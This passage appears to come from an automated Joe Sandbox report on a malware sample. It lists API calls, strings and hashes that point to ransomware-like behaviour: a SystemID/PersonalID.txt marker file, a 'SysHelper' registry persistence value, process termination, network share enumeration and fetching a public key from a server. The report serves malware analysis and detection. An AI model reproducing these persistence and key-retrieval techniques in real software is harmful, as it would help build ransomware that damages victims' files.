                  • Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8
                • _fgetws.LIBCMT ref: 0040C7BC
                • _memmove.LIBCMT ref: 0040C89F
                • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: CreateDirectory__wfsopen_fgetws_memmove
                • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                • API String ID: 2864494435-54166481
                • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                • Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
                • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                • Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99
                APIs
                • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
                • TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
                • CloseHandle.KERNEL32(00000000), ref: 004124B7
                • Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
                • CloseHandle.KERNEL32(00000000), ref: 004124CD
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                • String ID: cmd.exe
                • API String ID: 2696918072-723907552
                • Opcode ID: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                • Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
                • Opcode Fuzzy Hash: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                • Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9
                APIs
                • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040F338
                • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: SHGetFolderPathW$Shell32.dll$\
                • API String ID: 2574300362-2555811374
                • Opcode ID: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                • Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
                • Opcode Fuzzy Hash: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                • Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _malloc$__except_handler4_fprintf
                • String ID: &#160;$Error encrypting message: %s$\\n
                • API String ID: 1783060780-3771355929
                • Opcode ID: 03c951cbcffbb22e4b904cab30c58fb638dd7e4556e50294ac70ee7de3450d71
                • Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
                • Opcode Fuzzy Hash: 03c951cbcffbb22e4b904cab30c58fb638dd7e4556e50294ac70ee7de3450d71
                • Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _strncmp
                • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                • API String ID: 909875538-2908105608
                • Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                • Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
                • Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                • Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F
                APIs
                • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
                • RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                • RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
                • RegCloseKey.ADVAPI32(00000000), ref: 0040C72E
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: CloseValue$OpenQuery
                • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                • API String ID: 3962714758-1667468722
                • Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                • Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
                • Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                • Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58
                APIs
                • _memset.LIBCMT ref: 0041E707
                  • Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                • InternetOpenW.WININET ref: 0041E743
                • _wcsstr.LIBCMT ref: 0041E7AE
                • _memmove.LIBCMT ref: 0041E838
                • lstrcpyW.KERNEL32(?,?), ref: 0041E90A
                • lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
                • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
                • InternetCloseHandle.WININET(00000000), ref: 0041E9F3
                • InternetCloseHandle.WININET(00000000), ref: 0041E9F6
                • _strstr.LIBCMT ref: 0041EA36
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
                • DeleteFileA.KERNEL32(?), ref: 0041EA82
                • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
                • lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
                • lstrcpyA.KERNEL32(?,?), ref: 0041EABA
                • lstrlenA.KERNEL32(?), ref: 0041EAC8
                • lstrlenA.KERNEL32(00000022), ref: 0041EAE3
                • lstrcpyW.KERNEL32(?,00000000), ref: 0041EB5B
                • lstrlenA.KERNEL32(?), ref: 0041EB7C
                • _malloc.LIBCMT ref: 0041EB86
                • _memset.LIBCMT ref: 0041EB94
                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
                • lstrcpyW.KERNEL32(?,00000000), ref: 0041EBB6
                • _strstr.LIBCMT ref: 0041EBDA
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
                • DeleteFileA.KERNEL32(?), ref: 0041EC32
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                • String ID: bowsakkdestx.txt${"public_key":"
                • API String ID: 2805819797-1771568745
                • Opcode ID: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                • Instruction ID: c8d03ce4d59ef2fdab541fe9505dce31f646fa9b39186cada3cd653a8fd1c75a
                • Opcode Fuzzy Hash: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                • Instruction Fuzzy Hash: 3901D234448391ABD630DF119C45FDF7B98AF51304F44482EFD8892182EF78A248879B
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: __aulldvrm
                • String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
                • API String ID: 1302938615-3129329331
                • Opcode ID: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                • Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
                • Opcode Fuzzy Hash: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                • Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96
                APIs
                • ___unDName.LIBCMT ref: 0043071B
                • _strlen.LIBCMT ref: 0043072E
                • __lock.LIBCMT ref: 0043074A
                • _malloc.LIBCMT ref: 0043075C
                • _malloc.LIBCMT ref: 0043076D
                • _free.LIBCMT ref: 004307B6
                  • Part of subcall function 004242FD: IsProcessorFeaturePresent.KERNEL32(00000017,004242D1,i;B,?,?,00420CE9,0042520D,?,004242DE,00000000,00000000,00000000,00000000,00000000,0042981C), ref: 004242FF
                • _free.LIBCMT ref: 004307AF
                  • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                  • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _free_malloc$ErrorFeatureFreeHeapLastNamePresentProcessor___un__lock_strlen
                • String ID:
                • API String ID: 3704956918-0
                • Opcode ID: 36539338cfbcad0928be78389f669657de3690c66bdbd94f98a67f280fd4e95b
                • Instruction ID: 67f118bcdaa5faec8c00adc58c02bfbdeebce6865ed580ae06d436c8457e8144
                • Opcode Fuzzy Hash: 36539338cfbcad0928be78389f669657de3690c66bdbd94f98a67f280fd4e95b
                • Instruction Fuzzy Hash: 3121DBB1A01715ABD7219B75D855B2FB7D4AF08314F90922FF4189B282DF7CE840CA98
                APIs
                • timeGetTime.WINMM ref: 00411B1E
                • timeGetTime.WINMM ref: 00411B29
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B4C
                • DispatchMessageW.USER32(?), ref: 00411B5C
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B6A
                • Sleep.KERNEL32(00000064), ref: 00411B72
                • timeGetTime.WINMM ref: 00411B78
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: MessageTimetime$Peek$DispatchSleep
                • String ID:
                • API String ID: 3697694649-0
                • Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                • Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
                • Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                • Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9
                APIs
                • __init_pointers.LIBCMT ref: 00425141
                  • Part of subcall function 00427D6C: EncodePointer.KERNEL32(00000000,?,00425146,00423FFE,00507990,00000014), ref: 00427D6F
                  • Part of subcall function 00427D6C: __initp_misc_winsig.LIBCMT ref: 00427D8A
                  • Part of subcall function 00427D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004326B3
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004326C7
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004326DA
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004326ED
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00432700
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00432713
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00432726
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00432739
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0043274C
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0043275F
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00432772
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00432785
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00432798
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004327AB
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004327BE
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004327D1
                • __mtinitlocks.LIBCMT ref: 00425146
                • __mtterm.LIBCMT ref: 0042514F
                  • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B62
                  • Part of subcall function 004251B7: _free.LIBCMT ref: 00428B69
                  • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(0050AC00,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B8B
                • __calloc_crt.LIBCMT ref: 00425174
                • __initptd.LIBCMT ref: 00425196
                • GetCurrentThreadId.KERNEL32 ref: 0042519D
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                • String ID:
                • API String ID: 3567560977-0
                • Opcode ID: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
                • Instruction ID: 366d1241f395ce705af539ece55ec53f654f371a685379b5f067519d47a60e56
                • Opcode Fuzzy Hash: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
                • Instruction Fuzzy Hash: 75F0CD32B4AB712DE2343AB67D03B6B2680AF00738BA1061FF064C42D1EF388401455C
                APIs
                • __lock.LIBCMT ref: 0042594A
                  • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                  • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                  • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                • _free.LIBCMT ref: 00425970
                  • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                  • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                • __lock.LIBCMT ref: 00425989
                • ___removelocaleref.LIBCMT ref: 00425998
                • ___freetlocinfo.LIBCMT ref: 004259B1
                • _free.LIBCMT ref: 004259C4
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                • String ID:
                • API String ID: 626533743-0
                • Opcode ID: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                • Instruction ID: 81c7b0a8007453265eca5a285afc690957d7e654b57493ebbede42104a270bc8
                • Opcode Fuzzy Hash: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                • Instruction Fuzzy Hash: E801A1B1702B20E6DB34AB69F446B1E76A0AF10739FE0424FE0645A1D5CFBD99C0CA5D
                APIs
                • ___from_strstr_to_strchr.LIBCMT ref: 004507C3
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: ___from_strstr_to_strchr
                • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                • API String ID: 601868998-2416195885
                • Opcode ID: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                • Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
                • Opcode Fuzzy Hash: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                • Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: .\crypto\buffer\buffer.c$g9F
                • API String ID: 2102423945-3653307630
                • Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                • Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
                • Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                • Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9
                APIs
                • __getptd_noexit.LIBCMT ref: 004C5D3D
                  • Part of subcall function 0042501F: GetLastError.KERNEL32(?,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425021
                  • Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
                  • Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
                  • Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
                  • Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425083
                • __calloc_crt.LIBCMT ref: 004C5D60
                • __get_sys_err_msg.LIBCMT ref: 004C5D7E
                • __get_sys_err_msg.LIBCMT ref: 004C5DCD
                Strings
                • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                • API String ID: 3123740607-798102604
                • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                • Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
                • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                • Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _fprintf_memset
                • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                • API String ID: 3021507156-3399676524
                • Opcode ID: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                • Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
                • Opcode Fuzzy Hash: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                • Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA
                APIs
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Path$AppendFolder
                • String ID: bowsakkdestx.txt
                • API String ID: 29327785-2616962270
                • Opcode ID: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                • Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
                • Opcode Fuzzy Hash: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                • Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9
                APIs
                • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                • ShowWindow.USER32(00000000,00000000), ref: 0041BABE
                • UpdateWindow.USER32(00000000), ref: 0041BAC5
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Window$CreateShowUpdate
                • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                • API String ID: 2944774295-3503800400
                • Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                • Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
                • Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                • Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C
                APIs
                • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00410C12
                • GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00410C39
                • _memset.LIBCMT ref: 00410C4C
